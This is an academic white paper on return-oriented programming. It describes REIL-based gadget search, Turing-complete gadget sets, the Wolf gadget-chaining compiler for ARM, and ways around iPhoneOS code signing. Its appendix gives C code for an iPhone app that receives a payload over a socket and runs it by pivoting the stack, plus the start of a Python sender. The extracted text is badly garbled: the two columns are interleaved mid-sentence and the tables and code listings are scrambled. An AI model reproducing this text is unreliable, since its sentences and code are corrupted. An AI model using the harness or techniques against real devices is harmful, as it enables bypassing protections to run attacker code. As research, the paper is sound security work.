Everybody be cool, this is a ROPpery - White paper

Everybody be cool, this is a roppery!

Vincenzo Iozzo Tim Kornau Ralf-Philipp Weinmann
zynamics GmbH zynamics GmbH University of Luxembourg
<vincenzo.iozzo@zynamics.com> <tim.kornau@zynamics.com> <ralf-philipp.weinmann@uni.lu>

Abstract a technique to bypass address randomization protection
mechanisms like ASLR [15].
We present algorithms which allow an attacker to
search for and compose gadgets regardless of the un-
derlying architecture using the REIL meta language. 1.1 The REIL meta-language
Gadgets are code fragments which can be used to build
unintended programs from existing code in memory. The Reverse Engineering Intermediate Language
Our contribution is a framework of algorithms capable (REIL) [5] is a platform-independent intermediate lan-
of locating a Turing-complete gadget set and a return- guage which aims to simplify static code analysis algo-
oriented compiler for the ARM architecture as a proof- rithms such as the gadget finding algorithm for return
of-concept implementation. This compiler accepts in- oriented programming presented in this paper. It allows
puts in an assembly-like language, simplifying the other- to abstract various specific assembly languages to fa-
wise tedious gadget selection process by hand. There- cilitate cross-platform analysis of disassembled binary
fore it enables the researcher to focus on the other parts code.
of successful exploitation by minimizing the shellcode REIL performs a simple one-to-many mapping of na-
development time. Furthermore we will discuss the nec- tive CPU instructions to sequences of simple atomic in-
essary steps for successful exploitation of iPhoneOS structions. Memory access is explicit. Every instruction
using the developed framework and the compiler. has exactly one effect on the program state. This con-
trasts sharply to native assembly instruction sets where
the exact behaviour of instructions is often influenced by
1 Introduction CPU flags or other pre-conditions.
All instructions use a three-operand format. For in-
Return-oriented programming [10, 14, 1, 6, 2, 9, 13, structions where some of the three operands are not
12, 3] is an offensive technique to achieve execution used, place-holder operands of a special type called
of code with arbitrary, attacker-defined behaviour with- ε are used where necessary. Each of the 17 different
out code injection. Enforcing least-privilege permis- REIL instruction has exactly one mnemonic that speci-
sions on memory pages as done by PaX [16] – the fies the effects of an instruction on the program state.
original predecessor of what is called Data Execution
Prevention (DEP) or NX on other operating systems – 1.1.1 The REIL VM
even more so in combination with mandatory, kernel-
enforced integrity checks on code pages such as those To define the runtime semantics of the REIL language it
used by iPhoneOS1 have made this and similar tech- is necessary to define a virtual machine (REIL VM) that
niques a necessity for the exploitation of memory cor- defines how REIL instructions behave when interacting
ruptions. By chaining sequences of instructions in the with memory or registers.
executable memory of the attacked process, an attacker The name of REIL registers follows the convention
can leverage a memory corruption vulnerability into a t-number, like t0, t1, t2. The actual size of these reg-
practical exploit even in the presence of these protec- isters is specified upon use, and not defined a priori (In
tion mechanisms. Return-oriented programming is not practice only register sizes between 1 byte and 16 bytes
have been used). Registers of the original CPU can be
1a security measure called “code signing” used interchangeably with REIL registers.

1

The REIL VM uses a flat memory model without align- possible attack surface and the reliability of exploits.
ment constraints. The endianness of REIL memory ac- The two most significant techniques to prevent attacks
cesses equals the endianness of memory accesses of on iPhoneOS are code signing and application sand-
the source platform. boxing. On the other hand, ASLR has not yet appeared
on this platform to date. Code signing is a security mea-
sure aimed at allowing only signed code to be executed
1.1.2 REIL instructions on the phone. This is achieved by introducing an extra
REIL instructions can loosely be grouped into five dif- segment in the binary which contains a signature that it
ferent categories according to the type of the instruction is used at runtime by the kernel to verify the authenticity
(See Table 1). of the binary and more importantly which pages in the
process address space are to be marked as Executable.
A RITHMETIC INSTRUCTIONS O PERATION The rules that code signing enforces are mainly two:
ADD x1 , x2 , y y = x1 + x2
SUB x1 , x2 , y y = x1 − x2 1. Pages marked with WRITE permissions can’t have
MUL x1 , x2 , y y = j1 · k2
x x
DIV x1 , x2 , y y = x1
x EXECUTABLE permissions
2
MOD x1 , x2 , y y = ( mod x2
x1
x2
j1 · 2 k
x if x2 ≥ 0 2. It is not possible to allocate executable pages on
BSH x1 , x2 , y y = x1
2−x2
if x2 < 0 the heap
B ITWISE INSTRUCTIONS O PERATION
AND x1 , x2 , y y = x1 &x2 Unlike many desktop operating systems it is not pos-
OR x1 , x2 , y y = x1 | x2
XOR x1 , x2 , y y = x1 ⊕ x2 sible to disable code signing on iPhoneOS from un-
L OGICAL INSTRUCTIONS O PERATION
 privileged processes in user-space. In fact the policy
1 if x1 = 0
BISZ x1 , ε, y y =
0 if x1 = 0
is enforced in the kernel using mandatory access con-
JCC x1 , ε, y transfer control flow to y iff x1 = 0 trol (MAC) policies. The implementation of this secu-
DATA TRANSFER INSTRUCTIONS O PERATION rity measure is contained in the AMFI3 kernel extension
LDM x1 , ε, y y = mem[x1 ]
STM x1 , ε, y mem[y ] = x1 and thus not modifiable at user space by non-root pro-
STR x1 , ε, y y = x1 cesses.
OTHER INSTRUCTIONS O PERATION
NOP ε, ε, ε no operation The second notable security countermeasure used
UNDEF ε, ε, y undefined instruction on iPhoneOS is application sandboxing. This works
UNKN ε, ε, ε unknown instruction
by enforcing a MAC policy – implemented in the sand-
Figure 1: List of REIL instructions box kernel extension4 – to access files and network re-
sources. Depending on the process the enforced sand-
Arithmetic and bitwise instructions take two input box profile varies significantly. Some processes running
operands and one output operand. Input operands ei- as root have no sandbox policy enforced at all which
ther are integer literals or registers; the output operand makes them a perfect target if the attacker is able to
is a register. None of the operands have any size re- create a two-stage attack. Standard applications with
strictions. However, arithmetic and bitwise operations network interaction like the browser and the email client
can impose a minimum output operand size or a max- have a tightened policy enforced. Applications from the
imum output operand size relative to the sizes of the AppStore are the ones with the strictest sandbox profile
input operands. which makes them an undesirable target for an attacker.
Note that certain native instructions such as FPU In order for an exploit to be effective an attacker must
instructions and multimedia instruction set extensions overcome the limitations imposed by code signing and
cannot be translated to REIL code yet. Another limita- application sandboxing. To date the only available tech-
tion is that some instructions which are close to the un- nique to defeat code signing is the usage of return-
derlying hardware such as privileged instructions can oriented programming payloads. Nonetheless the level
not be translated to REIL; similarly exceptions are not of access to the system is still depending on the sand-
handled. All of these cases require an explicit and ac- box policy of the targeted process.
curate modelling of the respective hardware features. Another important consideration to be made regard-
ing the design of exploits on iPhoneOS is the complexity
of reliably testing the payload. On non-jailbroken iPho-
1.2 iPhone peculiarities neOS devices it is not possible to debug third-party ap-
plications; therefore the only information available on
Since the first release of iPhoneOS2 a number of coun- the target process are crash logs collected by iTunes.
termeasures were introduced in order to reduce the 3 AMFI(Apple Mobile File Integrity)
2 which has been renamed to iOS 4 formerly called seatbelt

2

A simple, yet effective, technique to test the correct- trees to identify the subset of gadgets that we are inter-
ness of return-oriented programming payloads is to cre- ested in.
ate test programs linked against the frameworks used The templates are specified manually. For every op-
by the target process. These can then be debugged us- eration only one gadget is needed. For a set of gad-
ing the XCode iPhone debugger. It has to be noticed gets which perform the same operation only the sim-
that as mentioned before the sandbox profile of testing plest gadget is selected.
applications are stricter than the ones of certain high-
likely targets and it is not possible to change the profile
in order to closely resemble the one of the target. There- Structure of paper The paper is organized as follows:
fore only the programmatic correctness of the return- Section 2 gives a description of the algorithm used for
oriented programming gadgets can be checked with this finding gadgets. Section 3 looks at suitable gadget sets
technique, and not the effectiveness of the payload itself and elaborates on the complexity of gadgets and their
against the original target. side effects. Section 4 describes the design and imple-
mentation of a compiler which can automatically chain a
1.3 Problem approach set of located gadgets to produce valid return-oriented
programming shellcode from an custom low-level lan-
Our goal is to build a program which consists of existing guage. Section 5 concludes.
code chunks from other programs. We call a program
that is built from the parts of another program a return-
oriented program 5 . To build a return oriented program, 2 Algorithms for finding Gadgets
atomic parts that form the instructions in this program
have to be identified first. Parts of the original code that
can be combined to form a return-oriented program are 2.1 Stage I
called “gadgets”.
In order to be combinable, gadgets must end in an Locating Free Branch Instructions In order to iden-
instruction that allows the attacker to dictate which gad- tify all gadgets, we first identify all free branch instruc-
gets shall be executed next. This means that gadgets tions in the targeted binary. This is currently done by
must end in instructions that set the program counter to explicitly listing them.
a value that is obtained from either memory or a regis-
ter. We call such instructions “free branch” instructions.
A “free branch” instruction must satisfy the following Goal for Stage I The goal of the data collection phase
properties: is to provide us with:

• The instruction has to change the control flow (e.g. • possible paths that are usable for gadgets and end
set the program counter) in a free-branch instruction
• The target of the control flow must be computed
• a REIL representation of the instructions on the
from a register or memory location.
possible paths.
In order to achieve Turing-completeness, only a small
number of gadgets are required. Furthermore, most
gadgets in a given address space are difficult to use Path Finding From each free branch instruction, we
due to complexity and side effects. The presented algo- collect all regular control-flow-paths of a pre-configured
rithms identify a subset of gadgets in the larger set of all maximum length within the function that the branch is
gadgets that are both sufficient for Turing-completeness located in.
and also convenient to program in. We only take paths into account which are shorter
We build the set of all gadgets by identifying all than a user defined threshold. A threshold is necessary
“free branch” instructions and performing bounded code because otherwise it will get infeasible to analyse all ef-
analysis on all paths leading to these instructions. In or- fects of encountered instructions.
der to search for useful gadgets in the set of all gadgets, A path has no minimum length and we are storing a
we represent the gadgets in tree form. On this tree form, path each time we encounter a new instruction. Along
we perform several normalizations. Finally, we search with the information about the traversed instructions we
for pre-determined instruction “templates” within these also store the traversed basic blocks to differentiate
5 Independent of whether an actual return instruction is part of the paths properly. The path search is therefore, a utiliza-
program or not tion of [Depth-limited search (DLS)] [17] .

3

Instruction Representation We now have all possi- the time the instruction is executed and can therefore,
ble paths which are terminated by our selected free- safely be used as source.
branch instructions and are shorter than the defined Memory writes are different because they can use
threshold. To construct the gadgets we must determine a register or a register plus offset as target for stor-
what kind of operation the instructions on the possible ing memory (Line 1 Figure 3). This register holding
paths perform. the memory address can be reused by later instructions
We represent the operation that the code path per- (Line 2 Figure 3). Therefore, it can not safely be used
forms in form of a binary expression tree. We can as target because information about it could get lost.
construct this binary expression tree from the path
in a platform-independent manner by using the REIL-
representation of the code on this path. 0x00000001 stm 12345678, ,R0
An expression tree (Figure 2) is a simple structure 0x00000002 add 1, 2, R0
which is used to represent complex functions as a bi-
nary tree. In case of an expression tree leaf node,
nodes are always operands and non-leaf nodes are al- Figure 3: Reusing registers example
ways operators.
We deal with this problem by assigning a new unique
STM value every time a memory store takes place as key
to the tree. Therefore, we do not lose the information
that the memory write took place. Also we still need the
+ ⊗ information about where memory gets written. We do
this by storing the target REIL expression tree represen-
⊗ tation in our expression tree. This prevents sequential
R3 R2
instructions from overwriting the contents of the regis-
ter. Even though there are more ways to achieve the
R4 123 R3 R2 same uniqueness for memory writes (like SSA) [4] the
implemented behaviour solves the problem without the
additional overhead of other solutions.
Figure 2: Expression tree example
Some architectures include instructions which de-
Using a binary tree structure we can compare trees pend on the current system state. System state is in this
and sub-trees. Multiple instructions can be combined, case for example a flag condition for platforms where
because operands are always leaf nodes and therefore, flags exist. For these instructions we need to make sure
an already existing tree for an instruction can be up- that the instructions expression tree can hold the infor-
dated with new information about source operands by mation about the operation for all possible cases.
simply replacing a leaf node with an associated source What we are looking for is a way to only have a single
operands tree. expression tree for a conditional instruction. To be able
When the algorithm is finished we have a REIL ex- to fulfil this requirement we must have all possible out-
pression tree representation for each instruction which comes of the instruction in our expression tree. This is
we have encountered on any possible path leading to possible by using the properties of multiplication to only
the free-branch instruction. As some instructions will allow one of the possible outcomes to be valid at any
alter more than one register one tree represents the ef- time and combining all possible outcomes by addition.
fects on only one register and a single instruction there-
fore, might have more than one tree associated with it.
result = pathtrue ∗ condition + pathfalse ∗!condition
Special Cases The algorithm we have presented Figure 4: Cancelling mechanism
works for almost all cases but still needs to handle some
special cases which include memory writes to dynamic
register values and system state dependent execution This works because flag conditions are always one or
of instructions. zero therefore, the multiplication can either be zero or
For memory reads even if multiple memory ad- the result of the instructions operation in the case of the
dresses are read we do not need any special treatment. specific flag setting. Using this cancelling mechanism
This is because the address of a memory read is either (Figure 4) we avoid storing multiple trees for conditional
a constant or a register. Both have a defined state at instructions.

4

2.2 Stage II have reached the free branch instruction and we have a
sound statement about all effects, the redundant infor-
Goal for Stage II Our overall goal is to be able to au- mation will be removed.
tomatically search for gadgets. The information which
we have extracted in the first stage does not yet en-
able an algorithm to perform this search. This is due Determining Jump Conditions To determine if we
to the missing connection between the extracted paths have encountered a conditional branch and need to ex-
and the effects of the instructions on the path. In this tract its condition we use a series of steps which allow
stage of our algorithms we will merge the informations us to include the information about the condition to be
extracted in stage I and enable stage III to locate gad- met in the final result of the merging process.
gets. The merge process combines the effects of single
For each instruction which is encountered while we
native instructions along all possible paths
traverse the path in execution order, the expression
trees for this instruction are searched for the existence
Merging Paths and Expression Trees On assembly of a conditional branch. If we find a conditional branch
level almost any function can be described as a graph in the expression trees we determine if the next address
of connected basic blocks which hold instructions. We in the path is equal to the branch target address. If the
extracted the effects of these native instructions into ex- address is equal to the branch target we generate the
pression trees in stage I using REIL as representation. condition ”branch taken” if not the condition ”branch not
Also, we extracted path information about all possible taken” is generated. As we want to be able to know
paths through the graph in reverse execution order us- which exact condition must be true or false we save the
ing depth limited search in stage I. Each path informa- expression tree along with the condition. If we do not
tion is one possible control flow through the available find a conditional branch no further action is taken.
disassembly of a function ending in a “free branch” in-
struction and limited by the defined threshold.
But when we are executing instruction sequences Merging Instruction Sequence Effects As we want
they are executed in execution order following the con- to make a sound statement about all effects which a
trol flow of the current function. This control flow through sequence of instructions has on registers and memory,
a function is determined by the branches which connect we need to merge the effects of single instructions on
the basic blocks. one path.
As we have extracted path information in reverse ex- To perform the merge we start with the first instruction
ecution order, we potentially have conditional branches on an extracted path. We save the expression trees for
in our execution path. Therefore, to be able to use the the first instruction, which represent the effects on reg-
path we need to determine the condition which needs isters or memory. This saved state is called the current
to be met for the path to be executable. effect state. Then, following the execution path, we it-
Given that all potential conditions can be extracted erate through the instructions. For each instruction we
we need to take the encountered instructions on the analyse the expression trees leaf nodes and locate all
path and merge their respective effects on registers and native register references. If a native register is a leaf
memory, such that we can make a sound statement node in an expression tree we check if we already have
about the effects of the executed instruction sequence. a saved expression tree for this register present from
Once path information and instruction effects are the previous instructions. If we have, the register leaf
merged the expression tree in a single expression tree node is substituted with the already saved expression
potentially contains redundant information. This redun- tree. Once all current instruction expression trees have
dant information is the result of the REIL translation and been analysed they are saved as the new current effect
the merging process. We do not need this redundant in- state by storing all current instructions expression trees
formation and therefore, need to remove it before start- in the old effect state. If there are new register or mem-
ing with stage III. ory write expression trees these are just stored along
with the already stored expression trees. But if we have
a register write to a register where an expression tree
General Strategy We have now specified all aspects has already been stored the stored tree is overwritten.
which need to be solved during the second stage algo- When the free branch instruction has been reached and
rithms. The first two described aspects are performed its expression trees have been merged the effect of all
by analysing one single path. For each encountered in- instructions on the current path is saved along with the
struction on the path the conditional branch detection path starting point. The following list summarizes the
and the merging process will be performed. After we results of the stage II algorithms.

5

• All effects on all written native registers are present this state the final effect state. This state is than saved
in expression tree form along with the starting address of the path.
• Native registers which are present as leaf nodes
are in original state prior to execution of the instruc- 2.3 Stage III
tion sequence
Goal for stage III In the last two stages the effects of
• All effects on written memory locations are present a series of instructions along a path have been gathered
in expression tree form and stored. This information is the basis for the actual
gadget search which is the third stage. Our goal is to
• All conditions which need to be met for path execu-
locate specific functionality within the set of all possible
tion are present in expression tree form
gadgets that were collected in the first two stages. A set
• Only effects which influence native registers are of multiple algorithms is used to pinpoint each specific
present in the saved expression trees functionality.
We start by describing the core function for gadget
search. We then focus on the actual locator functions.
Simplifying Expression Trees As we now have all
Finally we present a complexity estimation algorithm
effects which influence registers, memory and all condi-
which helps us with the decision which gadget to use
tions which need to be met stored in expression trees
for one specific gadget type.
the last step is to remove the redundant information
from the saved expression trees. Partly this redundancy
is due to the fact that REIL registers in contrast to na- Gadget Search Core Function Our overall goal is to
tive registers do not have a size limitation. To simulate locate gadgets which perform a specific operation. All
the size limitation of native registers REIL instructions of our potential gadgets are organized as a set of ex-
mask the values written to registers to the original size pression trees describing the effects of the instruction
of the native register. These mask instructions and their sequence. Therefore we need an algorithm which com-
operands are redundant and can be removed. Also, re- pares the expression trees of the gadget to expression
dundancy is introduced by REIL translation of instruc- trees which reflect a specific operation.
tions where the effect on a register or memory location To locate specific gadgets in the set of all gadgets
can only be represented correctly through a series of we use a central function which consecutively calls all
simple mathematical operations which can be reduced gadget locator functions for a single potential gadget.
to a more compact representation. This function then parses the result of the locator func-
tions to check if all the conditions for a specific gadget
S IMPLIFICATION OPERATION D ESCRIPTION
remove truncation remove truncation operands
type have been met. If all conditions for one gadget
remove neutral elements ∀ ∈ {+, , , , ⊗, |} → λ 0 ⇒ λ type have been met the potential gadget is included in
∀ ∈ {×, &} → λ 0 ⇒ 0
∀ ∈ {⊕, |, +} → 0 λ ⇒ λ
the list of this specific gadget type. For each potential
∀ ∈ {&, ×. , , ÷} → 0 λ ⇒ 0 gadget it is possible to be included into more than one
merge bisz eliminate two consecutive bisz instructions specific gadget list if it fulfils the conditions of more than
merge add, sub merge consecutive adds, subs and their
operands one gadget type.
calculate arithmetic given both arguments for an arithmetic
mnemonic are integers calculate the result
and store the result instead of the original
mnemonic and operands Specific Gadget Locator Functions To locate a spe-
cific gadget type our core gadget algorithm uses spe-
Figure 5: List of simplifications cific matching functions for each desired type of gadget.
These locator functions have the desired behaviour en-
The simplification is performed by applying the list of coded into an expression tree.
simplifications (Table 5) to each expression tree present The locator function parses all register, memory lo-
in the current effect state of a completely merged path. cation, condition and flag expression trees present in
In the simplification method the tree is tested in regard the current potential gadget. For each of the expression
to the applicability of the current simplification. If the trees it checks if it meets the initial condition present in
simplification is applicable, it is performed and the tree the locator. If one of the expression trees meets the ini-
is marked as changed. As long as one of the simplifi- tial condition then we compare the complete matching
cation methods can still simplify the tree as indicated by expression tree to the expression tree which has met
the changed mark the process loops. After the simplifi- the condition. If the expression tree matches the infor-
cation algorithm terminates, all expressions have been mation about the matched gadget is passed back to our
simplified according to the simplification rules. We call core algorithm for inclusion into the list of this gadget

6

type. If no match is found nothing is returned to the If we split the OSIC instruction into its atomic parts we
core algorithm. receive the three instructions:
Our defined gadget locators are not making perfect
matches which means that they are not strictly coupled • Subtract
to one specific instruction sequence. They rather try
• Compare less than zero
to reason about the effect a series of instructions has.
This behaviour is desired because using a rather loose • Jump conditional
matching we are able to locate more gadgets which pro-
vide us with equal operations. One example for such a These three instructions are common in all architec-
loose match is that our gadget locators accept a mem- tures and can therefore, be treated as one of the possi-
ory write to be not only addressed by a register but also ble minimal gadget sets we can search for.
a combination of registers and integer offsets.
Practical Turing-complete Gadget Set Given the
Gadget Complexity Calculation It the last algorithm minimal Turing-complete gadget set we can theoreti-
we have collected all the gadgets which perform the de- cally now perform all possible computations possible on
sired operations we have predefined. The number of any other machine which is Turing-complete. But we
gadgets in a binary is about ten to twenty times higher are far from a real-world practical gadget set to perform
than the number of functions. But not all the gadgets realistic attacks. This is because we have a set of con-
are usable in a practical manner because they exhibit straints which need to be met in our gadget set to be
unintended side effects (See Section 3.1). These side practical.
effects must be minimized in such a way that we can
easily use the gadgets. For this reason we developed • We assume very limited memory
different metrics which analyse all gadgets to only select
the subset of gadgets which have minimal side effects. • We want to be able to perform most arithmetic di-
For each gadget the complexity calculation performs rectly
two very basic analysis steps. In the first step we de- • We want to be able to read/write memory
termine how many registers and memory locations are
influenced by the gadget. This is easy because it is • We want to alter control flow fine grained
equivalent to the number of expression trees which are
stored in the gadget. In the second step we count the • We need to be able to access I/O
number of nodes of all expression trees present in the
Therefore, our practical gadget set contains signifi-
gadget. While the first step gives us a good idea about
cantly more gadgets than needed for it to be Turing-
the gadgets complexity the second step remedies the
complete. We divide the gadgets we try to locate into
problem of very complex expressions for certain register
categories:
or memory locations which might lead to complications
if we want to combine two gadgets. • Arithmetic and logical (add, sub, mul, div, and, or,
xor, not, rsh, lsh)
3 Properties of Gadgets • Data movement (load/store from memory, move
between registers)
3.1 Turing-completeness
• Control (conditional/unconditional branch, function
Minimal Turing-complete Gadget Set As we want to call, leaf function call)
be able to perform arbitrary computation with our gad-
gets we need the gadget set to be Turing-complete. • System control (access I/O)
The simplest possible instruction set which is proven to
be Turing-complete is a one instruction set (OISC) [11] Gadget chaining Given the gadgets defined in the
computer. The instruction used performs the following above categories, we need a way to combine them
operations: to form our desired program. We are searching for
Subtract A from B, giving C; if C < 0, jump to D gadgets starting with free-branch instructions. A free-
branch instruction is defined to alter the control flow de-
Given that this exact instruction is not present in most if pending on our input. As all gadgets which we locate
not all architectures we need a more sophisticated gad- in the given binary end in a free-branch instruction, they
get set which allows us to perform arbitrary operations. can all be combined to form the desired program.

7

Side Effects of Gadgets All gadgets located by our implication that we need to make sure that certain con-
algorithms potentially influence registers or memory lo- ditions must be set in advance. This leads to more gad-
cations which are not part of the desired gadget type op- gets in the program and therefore, to more space which
eration. These effects are the side effects of a gadget. we need for the attack.
As we introduce metrics to determine the complexity of Using the defined metrics minimizes complex gad-
gadgets these side effects can be reduced. But in the gets and side effects and therefore, leads to an usable
case of a very limited number of gadgets for a specific gadget set.
gadget type side effects can be inevitable. Therefore,
we need to analyse which side effects can be present.
One possible side effect is that we write arbitrary infor- 4 Chaining gadgets with side-effects
mation into a register. This case can be solved by mark-
ing the register as tainted such that the value in the To automatically chain gadgets into useful programs, we
register must first be reinitialized if it is needed in any have written a basic compiler called “The Wolf”. As in-
subsequent gadget. This construction also holds for the put, this compiler takes programs written in a low-level
manipulation of flags. The second possible type of side form somewhat close to the assembly language of the
effect occurs when writing to a memory location that is target CPU; namely registers must be explicitly allo-
addressed other by a non-constant (e.g. register). In cated and the only construct to implement a loop is a
this case we have to make sure that prior to gadget ex- conditional goto instruction. For now, the only target
ecution the address where the memory write will take CPU that Wolf was tested with is ARM. In case a given
place is valid in the context of the program and does not statement cannot be compiled, the compiler emits an
interfere with gadgets we want to execute subsequent error message. A description of the Wolf language in
to the current gadget. This is not always possible and EBNF can be found in the appendix.
therefore, we try to avoid gadgets with memory side ef-
fects. Access statements define which registers can be
clobbered and which memory regions may be read and
overwritten by the side-effects of gadgets. The protect
3.2 Metrics and Minimizing Side Effects statement is used to tell the compiler which registers
As we have pointed out side effects are one of the major may not be clobbered by side-effects; all other regis-
problems when using instruction sequences which were ters are fair game. The allowcorrupt statement al-
not intended to be used like this. We have worked out lows to specify memory regions that may be overwrit-
metrics which help us categorize all usable gadgets to ten by side-effects; similarly allowread is used to tell
minimize side effects. the compiler which memory regions can be read with-
out causing exceptions.
• stack usage of the gadget in bytes
Control flow can be changed using the call gadget
• usage of written registers to call a native code function. To change the control-
flow within the ROP code, the gotoifnz statement can
• memory use of the gadget
be used which changes the control flow to a previously
• number of nodes in the expression trees of a gad- defined label within the code, depending on whether its
get first argument is non-zero or not. To do this, gadgets
that modify the stack pointer are used. For the call
• use of conditions in the gadget execution path gadget the compiler takes care to set the link register
appropriately6 .
In most attacks the size which can be used for an
attack is limited. Therefore the stack usage of the at-
Assignments. The most important but also the
tack must be small for the approach to be feasible. The
most challenging part to implement was the multi-
usage of registers should be small to avoid overwriting
assignment. The purpose of this construction is to give
potentially important information. The memory usage
the compiler freedom in how a requested register allo-
of the gadgets should be small to lower the potential ac-
cation or memory transfer is achieved by chaining gad-
cess to non accessible memory. The number of nodes
gets contained in the gadget catalog. To compile an
in the expression trees provide an indicator for the com-
assignment into ROP code, a breadth-first search on
plexity of the operations of the gadget. Therefore if we
the gadget catalog is performed that finds gadgets that
have only very few nodes the complexity is also very
low. The use of conditions in the gadget can have the 6 this is architecture specific.

8

modify the target values on the left-hand side of the as- References
signment. For a selection of gadgets we then need to
check whether any of their side-effects are unwanted. [1] Erik Buchanan, Ryan Roemer, Hovav Shacham,
This is implemented by using an external SMT (Satisfi- and Stefan Savage. When good instructions go
ability Modulo Theories) solver, in our case STP [8, 7] bad: generalizing return-oriented programming to
that checks whether the constraints defined by the ac- RISC. In Peng Ning, Paul F. Syverson, and
cess statements can be fulfilled. If we cannot find a gad- Somesh Jha, editors, ACM CCS 2008, pages 27–
get that directly performs the computation and the as- 38. ACM, 2008.
signment for a given component of the tuple, we search
for gadgets that can at least assign another register or [2] Stephen Checkoway, John A. Halderman, Ariel J.
memory location for the given component. We then re- Feldman, Edward W. Felten, B. Kantor, and
place the component of the LHS with that register or H. Shacham. Can DREs provide long-lasting secu-
memory location, record the side effects of the gadget rity? The case of return-oriented programming and
used and begin the search again. Note that assign- the AVC Advantage. Proceedings of EVT/WOTE
ments and multi-assignments may contain significant 2009, 2009.
amounts of computation; these cases will most likely re- [3] Stephen Checkoway and Hovav Shacham. Es-
quire the compiler to chain multiple gadgets per compo- cape from return-oriented programming: Return-
nent and may take significant amounts of time to com- oriented programming without returns (on the x86),
pile. 2010. In Submission.
[4] Ron Cytron, Jeanne Ferrante, Barry K. Rosen,
Mark N. Wegman, and F. Kenneth Zadeck. Ef-
ficiently computing static single assignment form
Implementation details The Wolf is implemented as and the control dependence graph. ACM Trans-
a Python package that needs to be imported. In order actions on Programming Languages and Systems,
to resolve forward references in the code, they have to 13(4):451–490, 1991.
be declared explicitly using the forwardref statement.
A program is compiled by simply prefacing a [5] Thomas Dullien and Sebastian Porst. REIL:
Python script containing the program to be compiled A platform-independent intermediate representa-
with import * from wolf.platform and running the tion of disassembled code for static code anal-
Python interpreter on this script. The wolf.platform ysis. http://www.zynamics.com/downloads/
class is an architecture and platform-specific subclass csw09.pdf, March 2009.
of the wolf class. [6] Aurélien Francillon and Claude Castelluccia. Code
injection attacks on harvard-architecture devices.
In CCS ’08: Proceedings of the 15th ACM confer-
ence on Computer and communications security,
5 Conclusions pages 15–26, New York, NY, USA, 2008. ACM.
[7] Vijay Ganesh. STP constraint solver. http://
sites.google.com/site/stpfastprover/.
We have presented algorithms to automate an
architecture-independent approach for finding gadgets [8] Vijay Ganesh and David L. Dill. A decision proce-
for return-oriented programming and related offensive dure for bit-vectors and arrays. In Werner Damm
techniques. By introducing the free-branch paradigm and Holger Hermanns, editors, CAV 2007, vol-
we are able to reason about gadgets in a more general ume 4590 of Lecture Notes in Computer Science,
form than previously proposed; this especially is help- pages 519–531. Springer, 2007.
ful when using an intermediate language. Furthermore
we have shown how a compiler can be built for chaining [9] Tim Kornau. Return oriented program-
gadgets even if these gadgets have strong side-effects. ming for the ARM architecture. http:
Previous compilers (for ROP on x86) used very simple //www.zynamics.com/static_html/downloads/
gadgets that were without side-effects. kornau-tim--diplomarbeit--rop.pdf, 2009.

With the proliferation of hardware-enforced data exe- [10] Sebastian Krahmer. x86-64 buffer overflow exploits
cution prevention on newer embedded devices we ex- and the borrowed code chunks exploitation tech-
pect our tools and techniques to be of significant value nique. http://www.suse.de/~krahmer/no-nx.
for offensive security research. pdf, September 2005.

9

[11] Farhad Mavaddat and Behrooz Parhami. URISC: A iPhone exploit payload tester source
The ultimate reduced instruction set computer. Re-
search Report 36, University of Waterloo, June The following code (Listing 1) can be used to test return-
1987. Research Report CS-87-36. oriented programming shellcode on an iPhone. For
each shellcode which one wants to test some of the
[12] Ryan Roemer. Finding the bad in good code: Au-
code must be changed. This change is necessary to
tomated return-oriented programming exploit dis-
gain access to the desired functions and because the
covery. M.s. thesis, University of California, San
length of the chained gadgets and the gadgets itself
Diego, 2009.
might vary.
[13] Ryan Roemer, Erik Buchanan, Hovav Shacham, 1 #import <UIKit/UIKit.h>
#import <AudioToolbox/AudioServices.h>
and Stefan Savage. Return-oriented program- 2
3
ming: Systems, languages, and applications. 4 #include <stdio.h>
5 #include <stdlib.h>
Manuscript, 2009. 6 #include <strings.h>
7 #include <err.h>
[14] Hovav Shacham. The geometry of innocent ﬂesh 8 #include <pthread.h>
#include <sys/socket.h>
on the bone: return-into-libc without function calls 9
10 #include <sys/syscall.h>
(on the x86). In Peng Ning, Sabrina De Capitani 11 #include <sys/unistd.h>
12 #include <netinet/in.h>
di Vimercati, and Paul F. Syverson, editors, ACM 13 #include <mach/mach.h>
CCS 2007, pages 552–561. ACM, 2007. 14
15 unsigned long stack_pointer = 0, eip = 0;
16
[15] The PaX team. Documentation for the PaX project: 17 void restoreStack()
Adress Space Layout Randomization design & 18 {
__asm__ __volatile__(
implementation. http://pax.grsecurity.net/ 19
20 "mov sp, %0tn"
docs/aslr.txt, April 2003. 21 "mov pc, %1"
22 :
23 :"r"(stack_pointer), "r"(eip + 0x14)
[16] The PaX team. Documentation for the PaX 24 );
project: Non-executable pages design & imple- 25 // WARNING: if any code is added to read_and_exec
26 // the ’eip + 0x14’ has to be recalculated
mentation. http://pax.grsecurity.net/docs/ 27 }
noexec.txt, May 2003. 28
29 int read_and_exec(int s)
30 {
[17] Wikipedia. Depth-limited search — Wikipedia, the 31 int n, length;
free encyclopedia, 2010. 32 unsigned int restoreStackAddr = &restoreStack;
33
34 fprintf(stderr, "Reading length... ");
35 if ((n = recv(s, &length, sizeof(length), 0)) != sizeof(length
))
36 {
37 if (n < 0)
38 {
39 perror("recv");
40 }
41 else
42 {
43 fprintf(stderr, "recv: short readn");
44 return -1;
45 }
46 }
47 fprintf(stderr, "%dn", length);
48 void *payload = malloc(length +1);
49 if(payload == NULL)
50 {
51 perror("Unable to allocate the buffern");
52 }
53 fprintf(stderr, "Sending address of restoreStack functionn");
54
55 if(send(s, &restoreStackAddr, sizeof(unsigned int), 0) == -1)
56 {
57 perror("Unable to send the restoreStack function address");
58 }
59
60 fprintf(stderr, "Reading payload... ");
61 if ((n = recv(s, payload, length, 0)) != length)
62 {
63 if (n < 0)
64 {
65 perror("recv");
66 }

10

67 else 145 AudioServicesPlaySystemSound(0xfff);
68 { 146 startServer();
69 fprintf(stderr, "recv: short readn"); 147 int retVal = UIApplicationMain(argc, argv, nil, nil);
70 return -1; 148 [pool release];
71 } 149 return retVal;
72 } 150 }
73
74 __asm__ __volatile__ ( Listing 1: iPhone payload test application
75 "mov %1, pcnt"
76 "mov %0, spnt" To send a payload to the test program a simple
77 :"=r"(stack_pointer), "=r"(eip)
78 ); Python script (Listing 2) can be used. An example for
__asm__ __volatile__ (
79 such a Python script is presented below.
80 "mov sp, %0nt"
81 "pop {r0, r1, r2, r3, r4, r5, r6, pc}" 1 import os
82 : 2 import sys
83 :"r"(payload) 3 import socket
84 ); 4 import struct
